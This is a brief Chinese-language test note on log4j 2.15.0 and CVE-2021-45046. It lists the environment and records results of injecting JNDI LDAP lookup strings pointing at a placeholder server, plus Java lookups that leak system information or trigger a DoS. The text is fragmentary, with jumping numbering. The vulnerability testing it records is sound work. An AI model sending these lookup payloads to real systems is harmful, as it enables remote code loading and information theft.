log4j RCE (CVE-2021-44228) 已在 2.15 版本中修复,但新发现了 CVE-2021-45046(引发 DoS)漏洞。
以下是测试结果。
[测试环境]
log4j-2.15.0 (api, core)
JRE-1.8.0
jdk1.8.0_151
Eclipse IDE (Maven Project)



${jndi:ldap://127.0.0.1#[ldap 服务器地址]} 形式插入 -> 发生 UnknownHostException,未引发 DoS
jndi:ldap://[ldap服务器]#[ldap服务器] 形式 -> 无漏洞

7-1. 插入 Java 语法 -> 系统信息泄露

7-2. 插入 Java 语法 -> illegalArgumentException,引发 DoS

-> 检查 illegalArgumentException 发生位置时,在 Switch case 语句中,2-5 中可导致系统信息泄露的 Java 语法(${java:version} 似乎是预期的流程。
